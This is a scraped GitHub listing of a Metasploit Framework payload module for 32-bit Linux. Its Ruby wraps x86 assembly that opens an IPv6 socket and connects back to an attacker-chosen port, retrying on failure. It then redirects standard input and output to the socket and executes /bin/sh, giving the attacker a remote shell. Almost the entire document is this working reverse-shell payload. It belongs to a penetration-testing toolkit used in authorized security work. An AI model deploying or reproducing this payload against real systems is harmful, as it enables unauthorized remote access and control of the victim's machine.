/
shell_reverse_tcp_ipv6_metasm.rb
134 lines (115 loc) · 2.67 KB
/
shell_reverse_tcp_ipv6_metasm.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module MetasploitModule
CachedSize = 168
include Msf::Payload::Single
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Reverse TCP Inline (IPv6)',
'Description' => 'Connect back to attacker and spawn a command shell over IPv6',
'Author' => 'Matteo Malvica <matteo[at]malvica.com>',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::CommandShellUnix
))
end
def generate_stage
temp = [datastore['LPORT'].to_i].pack('S>')
tcp_port = temp.unpack('H*')
payload_data =<<-EOS
xor ebx,ebx
mul ebx
push 0x6
push 0x1
push 0xa
mov ecx,esp
mov al,0x66
mov bl,0x1
int 0x80
mov esi,eax
xor eax,eax
mov al,0x2
xor ebx,ebx
int 0x80
cmp eax,ebx
je connect
ja exit
connect:
xor ecx,ecx
xor ebx,ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push ebx
push.i16 0x#{tcp_port}
push.i16 0xa
mov ecx, esp
push.i8 0x1c
push ecx
push esi
xor ebx,ebx
xor eax,eax
mov al,0x66
mov bl,0x3
mov ecx,esp
int 0x80
xor ebx,ebx
cmp eax,ebx
jne retry
xor ecx,ecx
mul ecx
mov ebx,esi
mov al,0x3f
int 0x80
xor eax,eax
inc ecx
mov ebx,esi
mov al,0x3f
int 0x80
xor eax,eax
inc ecx
mov ebx,esi
mov al,0x3f
int 0x80
xor edx,edx
mul edx
push edx
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
push edx
push ebx
mov ecx,esp
mov al,0xb
int 0x80
ret
retry:
xor ebx,ebx
push ebx
push.i8 0xa
mul ebx
mov ebx,esp
mov al,0xa2
int 0x80
jmp connect
ret
exit:
xor eax,eax
mov al,0x1
int 0x80
EOS
Metasm::Shellcode.assemble(Metasm::Ia32.new, payload_data).encode_string
end
end